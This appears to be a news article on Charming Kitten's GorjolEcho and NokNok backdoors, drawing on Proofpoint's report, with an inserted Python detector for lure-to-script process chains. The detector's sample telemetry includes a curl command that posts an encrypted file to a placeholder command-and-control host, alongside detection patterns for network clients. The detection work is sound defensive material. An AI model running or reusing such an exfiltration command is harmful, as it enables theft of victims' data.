
Charming Kitten: the evolution of cyber-attacks and new digital security threats

GorjolEcho and NokNok: the new cyber-espionage tools of the well-known Iranian group

A US think tank was recently targeted by the Iranian cyber-espionage group Charming Kitten using a macOS PowerShell malware named GorjolEcho. It was delivered through a password-protected archive shared via Dropbox and is designed to exfiltrate information from the infected system. A second infection, NokNok, was initiated by a similar method. This new malware collects detailed information about the infected system and sends it to a command and control (C&C) server. The group is believed to carry out attacks on behalf of Iran's Islamic Revolutionary Guard Corps.


Recently, a US think tank was targeted by Charming Kitten, a well-known group of Iranian cyber criminals. According to a report by Proofpoint, the group deployed a macOS PowerShell backdoor during the attack. The malicious activity began in mid-May, when a request for feedback on a project was sent to the think tank's nuclear security expert. The same email also asked for permission to send a draft for review.

GorjolEcho and NokNok: two dangerous digital security threats

In a subsequent email, the cyber-espionage group sent a malicious link that directed the recipient to a password-protected archive, hosted on Dropbox, containing an LNK file. This file triggers an infection chain that leads to the deployment of a new PowerShell backdoor, dubbed GorjolEcho by Proofpoint. The malware establishes persistence on the system and displays a decoy PDF to the recipient while, in the background, exfiltrating information to the command and control (C&C) server. A week later, the Charming Kitten group sent an email containing a password-protected ZIP file that starts an infection chain tailored for macOS, leading to the deployment of a bash script that establishes another persistent backdoor on the system.

Technical details of the cyber criminals' sophisticated activity

Known as NokNok, the script, according to Proofpoint, "is almost certainly a port or evolution of the aforementioned GorjolEcho and is intended to serve as a first foothold" on the victim's system. NokNok, which contains four modules, is able to collect credentials from the infected machine, list all currently running processes, record system, network and software information, and then send the data, encrypted, to the C&C server. According to Proofpoint, both GorjolEcho and NokNok could support additional modules that expand their functionality.
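The two infection chains described above (archive with an LNK file leading to a hidden PowerShell backdoor and a decoy PDF on Windows; a ZIP file leading to a bash script that talks to a C&C server on macOS) share a detectable shape in endpoint process telemetry: a script interpreter whose ancestry includes an opened archive or shortcut, which then shows a document or spawns a network client. The following is an added defender-side example, not code from the article or from Proofpoint; the event layout (pid, ppid, image, cmdline) and every sample event are constructed assumptions.

```python
"""Added example: flag process chains shaped like the two TA453 deliveries
described above (archive -> LNK -> PowerShell with a decoy PDF on Windows,
archive -> bash script on macOS). Event layout and samples are constructed."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")
INTERPRETERS = re.compile(r"(?:^|[\\/])(powershell|pwsh|bash|sh|zsh)(\.exe)?$", re.I)
LURE = re.compile(r"\.(lnk|zip|7z|rar)\b", re.I)      # shortcut or archive opened upstream
DECOY = re.compile(r"\.pdf\b", re.I)                  # decoy document shown to the victim
NET_CLIENT = re.compile(r"(?:^|[\\/])(curl|wget)$|Invoke-WebRequest|DownloadString", re.I)

def find_suspicious_chains(events):
    """Return [(interpreter_pid, reasons)] for script interpreters launched under a lure."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for e in events:
        if not INTERPRETERS.search(e.image):
            continue
        # Walk up the ancestry looking for a shortcut or archive being opened.
        ancestors, p = [], by_pid.get(e.ppid)
        while p is not None:
            ancestors.append(p)
            p = by_pid.get(p.ppid)
        lure = next((a for a in ancestors if LURE.search(a.cmdline)), None)
        if lure is None:
            continue
        reasons = [f"{e.image} launched under {lure.image} opening a lure file"]
        kids = children.get(e.pid, [])
        if any(DECOY.search(k.cmdline) for k in kids):
            reasons.append("opens a decoy document after the script starts")
        if any(NET_CLIENT.search(k.image) or NET_CLIENT.search(k.cmdline) for k in kids):
            reasons.append("spawns a network client (possible C2 check-in or exfiltration)")
        findings.append((e.pid, reasons))
    return findings

# Constructed sample telemetry: one benign PowerShell use, one suspicious chain per platform.
SAMPLE_EVENTS = [
    Event(1, 0, "explorer.exe", "explorer.exe"),
    Event(2, 1, "cmd.exe", 'cmd.exe /c "C:\\Users\\alice\\Downloads\\draft\\review.lnk"'),
    Event(3, 2, "powershell.exe", "powershell.exe -w hidden -f stage.ps1"),
    Event(4, 3, "AcroRd32.exe", "AcroRd32.exe draft_review.pdf"),
    Event(5, 1, "powershell.exe", "powershell.exe -Command Get-Date"),
    Event(11, 10, "/usr/bin/ditto", "ditto -x -k /Users/bob/Downloads/draft.zip /tmp/draft"),
    Event(12, 11, "/bin/bash", "/bin/bash /tmp/draft/setup.sh"),
    Event(13, 12, "/usr/bin/curl", "curl -s -X POST https://c2.example.invalid/up -d @/tmp/o.enc"),
]
```

Running `find_suspicious_chains(SAMPLE_EVENTS)` flags pid 3 (lure plus decoy PDF) and pid 12 (lure plus network client) while leaving the interactive PowerShell session alone; in a real deployment the regexes would be tuned to the archive tools and viewers actually present in the fleet.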

Charming Kitten: A cyber-espionage group behind multiple attacks

This new attack differs from previous Charming Kitten campaigns, which generally relied on VBA macros and remote template injection for malware delivery, the cybersecurity company points out. Despite this, Proofpoint attributes the attack to the Iranian group with high confidence, based on code similarities between GorjolEcho and NokNok and malware previously linked to the group, including GhostEcho, CharmPower and MacDownloader. Charming Kitten, also known as APT42, Mint Sandstorm (formerly Phosphorus), NewsBeef, Newscaster, TA453 and Yellow Garuda, is believed to operate on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC). In the past, the group has been responsible for targeted attacks on activists, government organizations, journalists and other entities, as well as ransomware attacks for financial gain. “TA453 continues to significantly adjust its infection chains to complicate detection efforts and conduct cyber espionage operations against its targets of interest. TA453's willingness to bring malware to Mach-O demonstrates the considerable effort the threat actor is willing to invest to achieve its objectives,” Proofpoint stressed. The continual adaptation of attack tactics by cyber-espionage groups such as Charming Kitten further underlines the need for robust cyber defenses and continued awareness of the risks present in the digital domain.


07/07/2023 15:22

Editorial AI
